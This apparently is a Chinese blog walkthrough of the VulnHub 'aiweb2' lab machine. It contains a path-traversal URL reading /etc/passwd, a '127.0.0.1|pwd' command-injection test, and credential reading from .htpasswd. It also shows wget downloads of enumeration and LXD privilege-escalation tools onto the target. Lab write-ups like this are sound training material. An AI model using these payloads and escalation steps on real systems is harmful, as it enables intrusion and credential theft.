VulnHub靶场练习-aiweb2

一、信息收集

先arp-scan -l 扫描发现靶机的ip地址

使用nmap -sS -sV -T4 -A -p- 192.168.10.134 扫描存活端口

访问该靶机的网址

http://192.168.10.134

遍历该网址

访问/webadmin

尝试登陆网页

成功登录

二、漏洞利用

1:遍历漏洞

尝试通过关键字检索漏洞

去漏洞库检索

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

第一个是文件遍历 可以读取一些文件

使用kali自带的火狐浏览器访问

http://192.168.10.134/download.php?file_name=../../../../../../../../../../../../../etc/passwd

可以看到自动下载了一个文件

遍历/etc/passwd文件成功

根据之前信息收集的结果来看,服务器采用apache

所以尝试读取/etc/apache2/.htpasswd文件

打开得到aiweb2的账号密码

解密

访问webadmin网页

发现robots下还有目录

访问第一个

得到一些灵感 输入了127.0.0.1测试

127.0.0.1|pwd测试

第二个

构造一个请求

访问这个新出现的文件

大胆猜测是ssh的账号密码

直接ssh登录

查看系统信息

权限提升:LXD漏洞

wget https://codeload.github.com/rebootuser/LinEnum/zip/refs/heads/master

kali执行

靶机执行

靶机下载

wget raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine

成功拿到shell啦 并找到flag文件了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

迟今天学习了吗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值